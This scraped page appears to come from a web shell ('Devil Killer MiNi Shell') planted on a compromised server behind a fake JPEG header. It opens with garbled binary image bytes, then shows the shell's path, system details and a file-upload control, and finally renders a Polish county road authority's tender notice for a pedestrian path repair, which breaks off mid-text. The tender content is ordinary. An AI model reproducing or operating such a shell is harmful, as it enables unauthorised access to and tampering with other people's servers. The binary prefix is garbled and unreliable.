JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250612/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250612/0027554001-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont drogi dla pieszych w miejscowości Pobłocie Wielkie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Białogardzki - Zarząd Dróg Powiatowych w Białogardzie</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Zarząd Dróg Powiatowych w Białogardzie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 330960380</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Szosa Połczyńska 57</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Białogard</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">78-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL426 - Koszaliński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@zdp.powiat-bialogard.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.powiat-bialogard.pl/bip</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Zarządzanie drogami powiatowymi </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont drogi dla pieszych w miejscowości Pobłocie Wielkie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8145001e-ae70-431a-bd5f-9b0423806501</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00275540</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00013916/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.7 Remont drogi dla pieszych w m. Pobłocie Wielkie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-8145001e-ae70-431a-bd5f-9b0423806501 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1) Z zastrzeżeniem art. 61 ust. 2 ustawy, komunikacja między zamawiającym a wykonawcami, w tym oferty oraz wszelkie oświadczenia, wnioski (w tym o wyjaśnienie treści SWZ), zawiadomienia i informacje przekazywane są przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl<br/>2) Korespondencja przekazana zamawiającemu w inny sposób (np. listownie, mailem) nie będzie brana pod uwagę. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i zamawiającego za pośrednictwem Platformy e-Zamówienia, zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail: przetargi@powiat-bialogard.pl (nie dotyczy składania ofert).<br/>3) Korzystanie z Platformy e-Zamówienia jest bezpłatne.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) Ofertę i oświadczenia, o których mowa w art. 125 ust. 1 ustawy, składa się, pod rygorem nieważności w formie elektronicznej (tj. przy użyciu kwalifikowanego podpisu elektronicznego) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>2) Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacja zamieszczona w zakładce „Centrum Pomocy”.<br/>3) Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania.<br/>4) Sposób sporządzania i przekazywania dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (zw. dalej „Rozporządzeniem w sprawie wymagań dla dokumentów elektronicznych”).<br/>5) Dokumenty elektroniczne, o których mowa w § 2 ust. 1 Rozporządzenia w sprawie wymagań dla dokumentów elektronicznych, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia Rady Ministrów z 12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (zw. dalej „Rozporządzeniem w sprawie Krajowych Ram Interoperacyjności”), z uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako załączniki. W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy, ww. regulacje nie będą miały bezpośredniego zastosowania.<br/>6) Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 Rozporządzenia w sprawie wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/>a. w formatach danych określonych w przepisach Rozporządzenia w sprawie Krajowych Ram Interoperacyjności (i przekazuje się jako załącznik), lub<br/>b. jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści „Formularza do komunikacji”).<br/>7) Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnicę przedsiębiorstwa”.<br/>Pozostałatreść w SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i ust. 2 rozporządzenia Parlamentu Europejskiego i rady (UE) 2016/679 z dnia <br/>27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych <br/>i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólnego <br/>rozporządzenia o ochronie danych), (Dz. Urz. z 04.05.2016 r. UE L119, s. 1 do 88), dalej RODO, <br/>informuję, że: <br/>1) Administratorem Pani/Pana danych osobowych jest Zarząd Dróg Powiatowych w Białogardzie, 78-<br/>200 Białogard, ul. Szosa Połczyńska 57, e-mail: sekretariat@zdp.powiat-bialogard.pl, tel. +48 94 <br/>312 40 07, w imieniu której działa Dyrektor ZDP, zwany dalej „ADMINISTRATOR”; <br/>2) Dane kontaktowe do inspektora ochrony danych: Dariusz Florek, Zarząd Dróg Powiatowych w <br/>Białogardzie, 78-200 Białogard, ul. Szosa Połczyńska 57, e-mail: iod@ordonotitia.pl. <br/>3) Pani/Pana dane osobowe przetwarzane będą w celu: <br/>a) związanym z potrzebą przeprowadzenia postępowania o udzielenie zamówienia publicznego <br/>„REMONT DROGI DLA PIESZYCH W MIEJSCOWOŚCI POBŁOCIE WIELKIE” <br/>prowadzonym w trybie podstawowym oraz realizacją i wypełnianiem obowiązku prawnego <br/>ciążącego na ADMINISTRATORZE na podstawie art. 6 ust. 1 lit. c) RODO, tj. obsługi przez <br/>ADMINISTRATORA kontrahentów i współpracowników na podstawie przepisów ustawy z <br/>dnia 11 września 2019 roku Prawo zamówień publicznych; <br/>b) realizacji i wykonywania umowy, której stroną jest osoba, której dane dotyczą, lub do podjęcia <br/>działań na żądanie osoby, której dane dotyczą, przed zawarciem umowy, w celu <br/>przeprowadzenia postępowania w ramach procedury zamówień publicznych przez <br/>ADMINISTRATORA, na podstawie art. 6 ust. 1 lit b) RODO, a także obsługi przez <br/>ADMINISTRATORA kontrahentów i współpracowników w zakresie wypełniania obowiązku <br/>wynikającego z umów zawartych na podstawie przepisów ustawy z dnia 11 września 2019 roku <br/>Prawo zamówień publicznych; <br/>c) niezbędnym dla ustalenia, dochodzenia lub obrony roszczeń wynikających ze zobowiązań, na <br/>podstawie art. 9 ust. 2 lit. f) RODO, np. roszczeń finansowych względem kontrahentów – <br/>wykonawców, biorących udział w postępowaniu organizowanym przez ADMINISTRATORA, <br/>wynikających z naliczonych opłat i kar lub kontraktowych, w celu rozliczeń zawartych umów <br/>z kontrahentami ADMINISTRATORA; <br/>4) odbiorcą Pani/Pana danych osobowych będą: <br/>a) osoby lub organy władzy publicznej oraz podmioty wykonujące zadania publiczne lub <br/>działające na zlecenie organów władzy publicznej, w zakresie i w celach, które wynikają z <br/>przepisów powszechnie obowiązującego prawa, w szczególności którym udostępniona zostanie <br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 <br/>roku Prawo zamówień publicznych; <br/>b) dane mogą być także przekazywane innym podmiotom, zapewniającym obsługę <br/>administracyjną, techniczną i informatyczną ADMINISTRATORA, a w szczególności <br/>podmiotom administrującym systemami informatycznymi, serwisujących sprzęt informatyczny, <br/>zapewniającym transport dokumentów i nośników elektronicznych, zapewniającym niszczenie <br/>dokumentów i nośników elektronicznych oraz podmiotom zapewniającym obsługę prawną. <br/>Przekazywanie danych realizowane będzie na podstawie zawartych umów, w tym powierzenia <br/>przetwarzania danych, a podmioty przetwarzające mogą je przetwarzać jedynie na polecenie <br/>ADMINISTRATORA, co należy rozumieć w ten sposób, że nie są uprawnione do <br/>przetwarzania tych danych we własnych celach. <br/>Pozostała treść w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DzT.271.23.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na remoncie drogi dla pieszych w miejscowości Pobłocie Wielkie. <br/>2. Ogólnie zakres rzeczowy inwestycji obejmuje: <br/>- remont nawierzchni drogi dla pieszych o łącznej powierzchni: 335,00 m2 <br/>- remont nawierzchni zjazdów o łącznej powierzchni: 130,00 m2 <br/>- remont nawierzchni schodów terenowych: 2 szt. <br/>- wykonanie wpustów ulicznych wraz z przykanalikami w ilości: 3 szt. <br/>Parametry techniczne drogi dla pieszych: <br/>a) Droga w planie: <br/>- szerokość: 1,50 m, <br/>- długość: 186,40 mb, <br/>b) Droga w profilu. <br/>Nowa niweleta drogi dla pieszych będzie odzwierciedleniem istniejącej niwelety. Spadek poprzeczny <br/>drogi dla pieszych: 2% (w stronę jezdni DP 3300Z). <br/>3. Projektowane konstrukcje nawierzchni. <br/>a) Konstrukcja nawierzchni drogi dla pieszych: <br/>8 cm – warstwa ścieralna z kostki betonowej koloru szarego <br/>5 cm – podsypka cementowo-piaskowa 1:4 <br/>10 cm – podbudowa z mieszanki niezwiązanej z kruszywem C90/3 <br/>10 cm – warstwa odcinająca z piasku istniejące warstwy podłoża gruntowego zagęszczone do Is&gt;0.99 <br/>(w przypadku niekorzystnego podłoża gruntowego należy doprowadzić podłoże gruntowe do G1) koryto <br/>wraz z profilowaniem (po zdjęciu humusu) <br/>b) Konstrukcja nawierzchni zjazdów: <br/>8 cm – warstwa ścieralna z kostki betonowej koloru grafitowego <br/>5 cm – podsypka cementowo-piaskowa 1:4 2 <br/>0 cm – podbudowa z mieszanki niezwiązanej z kruszywem C90/3 <br/>10 cm – warstwa odcinająca z piasku istniejące warstwy podłoża gruntowego zagęszczone do Is&gt;0.99 <br/>(w przypadku niekorzystnego podłoża gruntowego należy doprowadzić podłoże gruntowe do G1) koryto <br/>wraz z profilowaniem (po rozbiórce istniejących warstw konstrukcji nawierzchni) <br/>Szczegółowy zakres prac do wykonania został opisany w dokumentacji projektowej, która stanowi <br/>Załącznik Nr 2 do niniejszej specyfikacji. Załącznik nr 2 zawiera pełną dokumentację projektową na <br/>którą Zamawiający uzyskał zaświadczenie o braku podstaw do wniesienia sprzeciwu do zamiaru <br/>wykonywania robót budowlanych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233260-9 - Roboty budowlane w zakresie dróg pieszych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71355000-1 - Usługi pomiarowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Wg kolejności </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.7.) Kolejność kryterium: <span class="normal">1</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki dotyczące: <br/>1) zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie stawia warunków w powyższym zakresie. <br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to <br/>z odrębnych przepisów;<br/>Zamawiający nie stawia warunków w powyższym zakresie. <br/>3) sytuacji ekonomicznej lub finansowej;<br/>Zamawiający nie stawia warunków w powyższym zakresie. <br/>4) zdolności technicznej lub zawodowej;<br/>a) wykonał nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli <br/>okres prowadzenia działalności jest krótszy – w tym okresie, minimum 2 roboty budowlane oddane <br/>w umówionym terminie, polegające na budowie, przebudowie lub remoncie drogi dla pieszych,– o <br/>wartości nie mniejszej niż 100 000,00 zł brutto. <br/>b) dysponują osobami zdolnymi do wykonania zamówienia: <br/>– Kierownikiem Budowy (jedna osoba) – posiadającym uprawnienia budowlane do kierowania <br/>robotami budowlanymi w specjalności drogowej lub odpowiadające im ważne uprawnienia <br/>budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, a które <br/>uprawniają do pełnienia funkcji kierownika budowy; <br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, a także w przypadku, gdy <br/>wykonawca polega na zdolnościach technicznych innych podmiotów, wykonaniem robót budowlanych <br/>określonych powyżej winien wykazać się co najmniej jeden z wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia lub podmiot, na którego zdolnościach technicznych wykonawca będzie polegał. <br/>W przypadku, gdy wartość wyrażona będzie w walucie innej niż PLN, Zamawiający do oceny spełnienia <br/>warunku przez danego wykonawcę przeliczy podane wartości po średnim kursie tej waluty w stosunku do <br/>PLN publikowanym przez NBP w dniu publikacji ogłoszenia o zamówieniu. Jeżeli w dniu publikacji <br/>ogłoszenia postępowania NBP nie opublikuje kursu walut, Zamawiający przyjmie kurs opublikowany w <br/>pierwszym dniu roboczym po tej dacie. <br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, a także w przypadku, gdy <br/>wykonawca polega na zdolnościach zawodowych innych podmiotów, wykazaniem się dysponowania osobą <br/>określoną powyżej winien wykazać jeden z wykonawców wspólnie ubiegających się o udzielenie <br/>zamówienia lub podmiot na którego zdolnościach zawodowych wykonawca będzie polegał. <br/>Jeżeli wykonawca wskaże osobę, która ma miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, <br/>musi wykazać, że osoba ta legitymuje się kwalifikacjami odpowiadającymi wymaganym uprawnieniom w <br/>kraju zamieszkania, jeśli takie w tym kraju obowiązują, z uwzględnieniem prawa do wykonywania <br/>określonych zawodów regulowanych lub określonych działalności, jeżeli te kwalifikacje zostały uznane na <br/>zasadach przewidzianych w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji <br/>zawodowych nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz. U. 2023 r. poz. 334 z późn. <br/>zm.) oraz w ustawie z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów <br/>budownictwa (t.j. Dz. U. 2023 r. poz. 551 z późn. zm.). <br/>2. Zamawiający nie precyzuje wymagań w odniesieniu do warunków określonych w art. 112 ust. 2 pkt. 1, <br/>2, 3 ustawy Pzp. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Oświadczenie o braku zachodzenia wobec Wykonawcy przesłanek wykluczeniem z postępowania - wzór oświadczenia Załącznik nr 3 SWZ.<br/>2) Oświadczenie o spełnianiu przez Wykonawcę warunków udziału w postępowaniu – wzór oświadczenia Załącznik nr 4 SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełnienia warunków udziału w postępowaniu, Wykonawca na wezwanie <br/>Zamawiającego przedstawi następujące dokumenty: <br/>1) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres <br/>prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, <br/>daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz <br/>załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie <br/>przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez <br/>podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn <br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie <br/>dokumenty - zgodnie ze wzorem określonym w Załączniku nr 6 do SWZ, (okres 5 lat liczy się <br/>wstecz od dnia, w którym upływa termin składania ofert, a pod pojęciem należycie wykonane <br/>roboty budowlane należy rozumieć: roboty zostały wykonane zgodnie z umową oraz w <br/>umówionym terminie); <br/>2) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w <br/>szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na <br/>temat ich kwalifikacji zawodowych, uprawnień niezbędnych do wykonania zamówienia <br/>publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie 